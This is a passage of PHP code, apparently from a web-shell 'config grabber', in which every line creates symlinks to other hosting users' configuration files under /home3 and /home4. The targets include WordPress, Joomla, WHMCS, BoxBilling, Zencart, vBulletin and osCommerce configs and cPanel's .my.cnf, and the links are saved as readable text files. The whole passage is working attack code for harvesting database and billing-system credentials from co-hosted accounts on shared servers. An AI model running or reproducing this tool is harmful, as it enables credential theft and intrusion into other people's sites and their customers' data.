  1369. @symlink('/home3/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  1370. @symlink('/home3/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  1371. @symlink('/home3/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  1372. @symlink('/home3/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  1373. @symlink('/home3/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  1374. @symlink('/home3/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  1375. @symlink('/home3/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  1376. @symlink('/home3/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  1377. @symlink('/home3/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  1378. @symlink('/home3/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1379. @symlink('/home3/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1380. @symlink('/home3/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  1381. @symlink('/home3/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  1382. @symlink('/home3/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  1383. @symlink('/home3/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  1384. @symlink('/home3/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  1385. @symlink('/home3/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  1386. @symlink('/home3/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  1387. @symlink('/home3/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  1388. @symlink('/home3/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  1389. @symlink('/home3/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  1390. @symlink('/home3/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  1391. @symlink('/home3/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  1392. @symlink('/home3/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  1393. @symlink('/home3/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  1394. @symlink('/home3/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  1395. @symlink('/home3/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  1396. @symlink('/home3/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  1397. @symlink('/home3/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  1398. @symlink('/home3/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  1399. @symlink('/home3/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  1400. @symlink('/home3/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  1401. @symlink('/home3/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  1402. @symlink('/home3/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  1403. @symlink('/home3/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  1404. @symlink('/home3/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  1405. @symlink('/home3/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  1406. @symlink('/home3/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  1407. @symlink('/home3/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  1408. @symlink('/home3/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  1409. @symlink('/home3/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  1410. @symlink('/home3/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  1411. @symlink('/home3/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  1412. @symlink('/home3/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  1413. @symlink('/home3/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  1414. @symlink('/home3/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  1415. @symlink('/home3/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  1416. @symlink('/home3/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  1417. @symlink('/home3/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  1418. @symlink('/home3/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  1419. @symlink('/home3/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  1420. @symlink('/home3/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  1421. @symlink('/home3/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  1422. @symlink('/home3/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  1423. @symlink('/home3/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  1424. @symlink('/home3/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  1425. @symlink('/home3/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  1426. @symlink('/home3/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  1427. @symlink('/home3/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  1428. @symlink('/home3/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1429. @symlink('/home3/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1430. @symlink('/home3/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1431. @symlink('/home3/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  1432. @symlink('/home3/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  1433. @symlink('/home3/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  1434. @symlink('/home3/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  1435. @symlink('/home3/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  1436. @symlink('/home3/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  1437. @symlink('/home3/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  1438. @symlink('/home3/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  1439. @symlink('/home3/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  1440. @symlink('/home3/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  1441. @symlink('/home3/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  1442. @symlink('/home3/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  1443. @symlink('/home3/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  1444. @symlink('/home3/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  1445. @symlink('/home3/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  1446. @symlink('/home3/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  1447. @symlink('/home3/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  1448. @symlink('/home3/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  1449. @symlink('/home3/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  1450. @symlink('/home3/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  1451. @symlink('/home3/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  1452. @symlink('/home3/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  1453. @symlink('/home3/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  1454. @symlink('/home3/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  1455. @symlink('/home3/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1456. @symlink('/home3/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1457. @symlink('/home3/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1458. @symlink('/home3/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  1459. @symlink('/home3/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  1460. @symlink('/home3/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  1461. @symlink('/home3/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  1462. @symlink('/home3/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  1463. @symlink('/home3/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  1464. @symlink('/home3/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  1465. @symlink('/home3/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  1466. @symlink('/home3/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  1467. @symlink('/home3/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  1468. @symlink('/home3/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  1469. @symlink('/home3/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  1470. @symlink('/home3/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  1471. @symlink('/home3/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  1472. @symlink('/home3/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  1473. @symlink('/home3/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  1474. @symlink('/home3/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  1475. @symlink('/home3/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  1476. @symlink('/home3/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  1477. @symlink('/home3/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  1478. @symlink('/home3/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  1479. @symlink('/home3/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  1480. @symlink('/home3/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  1481. @symlink('/home3/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  1482. @symlink('/home3/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  1483. @symlink('/home3/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  1484. @symlink('/home3/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  1485. @symlink('/home3/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  1486. @symlink('/home3/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  1487. @symlink('/home3/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  1488. @symlink('/home3/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  1489. @symlink('/home3/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  1490. @symlink('/home3/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  1491. @symlink('/home3/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  1492. @symlink('/home3/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  1493. @symlink('/home3/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  1494. @symlink('/home3/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  1495. @symlink('/home3/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  1496. @symlink('/home3/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  1497. @symlink('/home3/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  1498. @symlink('/home3/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  1499. @symlink('/home3/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1500. @symlink('/home3/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  1501. @symlink('/home3/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  1502. @symlink('/home3/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  1503. @symlink('/home3/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  1504. @symlink('/home3/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  1505. @symlink('/home3/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  1506. @symlink('/home3/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  1507. @symlink('/home3/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  1508. @symlink('/home3/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1509. @symlink('/home3/'.$user.'/.my.cnf',$user.'-Cpanel.txt');
  1510. @symlink('/home3/'.$user.'/public_html/po-content/config.php',$user.'-Popoji.txt');
  1511. //Home4
  1512.  
  1513. @symlink('/home4/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  1514. @symlink('/home4/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  1515. @symlink('/home4/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  1516. @symlink('/home4/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  1517. @symlink('/home4/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  1518. @symlink('/home4/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  1519. @symlink('/home4/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  1520. @symlink('/home4/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  1521. @symlink('/home4/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  1522. @symlink('/home4/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  1523. @symlink('/home4/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  1524. @symlink('/home4/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  1525. @symlink('/home4/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  1526. @symlink('/home4/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  1527. @symlink('/home4/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  1528. @symlink('/home4/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  1529. @symlink('/home4/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  1530. @symlink('/home4/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  1531. @symlink('/home4/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  1532. @symlink('/home4/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  1533. @symlink('/home4/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  1534. @symlink('/home4/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  1535. @symlink('/home4/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  1536. @symlink('/home4/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  1537. @symlink('/home4/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  1538. @symlink('/home4/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  1539. @symlink('/home4/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  1540. @symlink('/home4/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  1541. @symlink('/home4/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  1542. @symlink('/home4/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  1543. @symlink('/home4/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  1544. @symlink('/home4/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  1545. @symlink('/home4/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  1546. @symlink('/home4/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  1547. @symlink('/home4/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  1548. @symlink('/home4/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  1549. @symlink('/home4/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  1550. @symlink('/home4/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  1551. @symlink('/home4/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  1552. @symlink('/home4/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  1553. @symlink('/home4/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  1554. @symlink('/home4/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  1555. @symlink('/home4/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  1556. @symlink('/home4/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  1557. @symlink('/home4/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  1558. @symlink('/home4/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  1559. @symlink('/home4/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  1560. @symlink('/home4/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  1561. @symlink('/home4/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  1562. @symlink('/home4/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1563. @symlink('/home4/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1564. @symlink('/home4/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  1565. @symlink('/home4/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  1566. @symlink('/home4/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  1567. @symlink('/home4/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  1568. @symlink('/home4/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  1569. @symlink('/home4/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  1570. @symlink('/home4/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  1571. @symlink('/home4/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  1572. @symlink('/home4/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  1573. @symlink('/home4/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  1574. @symlink('/home4/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  1575. @symlink('/home4/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  1576. @symlink('/home4/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  1577. @symlink('/home4/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  1578. @symlink('/home4/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  1579. @symlink('/home4/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  1580. @symlink('/home4/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  1581. @symlink('/home4/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  1582. @symlink('/home4/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  1583. @symlink('/home4/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  1584. @symlink('/home4/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  1585. @symlink('/home4/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  1586. @symlink('/home4/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  1587. @symlink('/home4/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  1588. @symlink('/home4/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  1589. @symlink('/home4/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  1590. @symlink('/home4/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  1591. @symlink('/home4/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  1592. @symlink('/home4/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  1593. @symlink('/home4/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  1594. @symlink('/home4/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  1595. @symlink('/home4/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  1596. @symlink('/home4/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  1597. @symlink('/home4/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  1598. @symlink('/home4/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  1599. @symlink('/home4/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  1600. @symlink('/home4/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  1601. @symlink('/home4/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  1602. @symlink('/home4/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  1603. @symlink('/home4/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  1604. @symlink('/home4/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  1605. @symlink('/home4/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  1606. @symlink('/home4/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  1607. @symlink('/home4/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  1608. @symlink('/home4/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  1609. @symlink('/home4/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  1610. @symlink('/home4/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  1611. @symlink('/home4/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  1612. @symlink('/home4/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1613. @symlink('/home4/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1614. @symlink('/home4/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1615. @symlink('/home4/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  1616. @symlink('/home4/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  1617. @symlink('/home4/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  1618. @symlink('/home4/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  1619. @symlink('/home4/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  1620. @symlink('/home4/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  1621. @symlink('/home4/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  1622. @symlink('/home4/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  1623. @symlink('/home4/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  1624. @symlink('/home4/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  1625. @symlink('/home4/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  1626. @symlink('/home4/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  1627. @symlink('/home4/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  1628. @symlink('/home4/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  1629. @symlink('/home4/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  1630. @symlink('/home4/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  1631. @symlink('/home4/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  1632. @symlink('/home4/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  1633. @symlink('/home4/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  1634. @symlink('/home4/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  1635. @symlink('/home4/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  1636. @symlink('/home4/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  1637. @symlink('/home4/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  1638. @symlink('/home4/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  1639. @symlink('/home4/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1640. @symlink('/home4/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1641. @symlink('/home4/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1642. @symlink('/home4/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  1643. @symlink('/home4/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  1644. @symlink('/home4/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  1645. @symlink('/home4/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  1646. @symlink('/home4/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  1647. @symlink('/home4/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  1648. @symlink('/home4/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  1649. @symlink('/home4/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  1650. @symlink('/home4/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  1651. @symlink('/home4/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  1652. @symlink('/home4/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  1653. @symlink('/home4/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  1654. @symlink('/home4/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  1655. @symlink('/home4/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  1656. @symlink('/home4/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  1657. @symlink('/home4/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  1658. @symlink('/home4/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  1659. @symlink('/home4/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  1660. @symlink('/home4/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  1661. @symlink('/home4/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  1662. @symlink('/home4/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  1663. @symlink('/home4/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  1664. @symlink('/home4/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  1665. @symlink('/home4/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  1666. @symlink('/home4/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  1667. @symlink('/home4/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  1668. @symlink('/home4/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  1669. @symlink('/home4/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  1670. @symlink('/home4/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  1671. @symlink('/home4/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  1672. @symlink('/home4/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  1673. @symlink('/home4/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
